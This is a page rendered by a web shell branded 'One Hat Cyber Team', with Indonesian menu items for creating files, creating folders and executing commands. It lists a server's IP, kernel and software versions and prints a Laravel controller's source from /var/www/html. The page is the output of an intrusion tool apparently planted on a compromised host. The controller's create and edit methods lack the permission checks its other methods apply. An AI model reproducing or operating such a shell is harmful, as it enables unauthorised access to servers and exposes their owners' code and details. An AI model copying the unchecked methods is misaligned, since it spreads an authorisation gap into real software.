⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
app
/
Http
/
Controllers
/
View File Name :
PerformanceTypeController.php
<?php namespace App\Http\Controllers; use App\Models\PerformanceType; use Illuminate\Http\Request; class PerformanceTypeController extends Controller { public function index() { if(\Auth::user()->can('manage performance type')) { if(\Auth::user()->type == 'company') { $types = PerformanceType::where('created_by', '=', \Auth::user()->creatorId())->get(); return view('performanceType.index', compact('types')); } else { return redirect()->back()->with('error', __('Permission denied.')); } } } public function create() { return view('performanceType.create'); } public function store(Request $request) { if(\Auth::user()->can('create performance type')) { if(\Auth::user()->type == 'company') { $validator = \Validator::make( $request->all(), [ 'name' => 'required', ] ); if($validator->fails()) { $messages = $validator->getMessageBag(); return redirect()->back()->with('error', $messages->first()); } $types = new PerformanceType(); $types->name = $request->name; $types->created_by = \Auth::user()->creatorId(); $types->save(); return redirect()->route('performanceType.index')->with('success', __('Performance Type successfully created.')); } else { return redirect()->back()->with('error', __('Permission denied.')); } } } public function show(PerformanceType $performanceType) { // } public function edit(PerformanceType $performanceType) { return view('performanceType.edit', compact('performanceType')); } public function update(Request $request, PerformanceType $performanceType) { if(\Auth::user()->can('edit performance type')) { if(\Auth::user()->type == 'company') { $validator = \Validator::make( $request->all(), [ 'name' => 'required', ] ); if($validator->fails()) { $messages = $validator->getMessageBag(); return redirect()->back()->with('error', $messages->first()); } $performanceType->name = $request->name; $performanceType->created_by = \Auth::user()->creatorId(); $performanceType->save(); return redirect()->route('performanceType.index')->with('success', __('Performance Type successfully updated.')); } else { return redirect()->back()->with('error', __('Permission denied.')); } } } public function destroy(PerformanceType $performanceType) { if(\Auth::user()->can('delete performance type')) { if(\Auth::user()->type == 'company') { $performanceType->delete(); return redirect()->route('performanceType.index')->with('success', __('Performance Type successfully deleted.')); } else { return redirect()->back()->with('error', __('Permission denied.')); } } } }